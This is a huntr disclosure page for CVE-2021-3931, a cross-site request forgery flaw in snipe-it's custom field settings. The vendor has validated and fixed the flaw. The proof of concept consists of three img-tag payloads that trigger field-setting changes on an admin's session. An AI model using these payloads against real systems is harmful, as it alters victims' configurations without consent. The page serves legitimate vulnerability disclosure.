Headline
CVE-2021-3931: huntr: Cross-Site Request Forgery (CSRF) PHP Vulnerability in snipe-it
snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)
Valid
Description
CSRF in custom field settings
Proof of Concept
<img src="http://<SNIPE_IT_APP>/fields/1/fieldset/1/disassociate">
<img src="http://<SNIPE_IT_APP>/fields/required/3/3">
<img src="http://<SNIPE_IT_APP>/fields/optional/3/3">
Impact
This vulnerability is capable of trick admin user to modify custom forms
Occurences
We are processing your report and will contact the snipe/snipe-it team within 24 hours. 8 days ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 7 days ago
snipe validated this vulnerability 7 days ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe confirmed that a fix has been merged on 0d811d 7 days ago
snipe has been awarded the fix bounty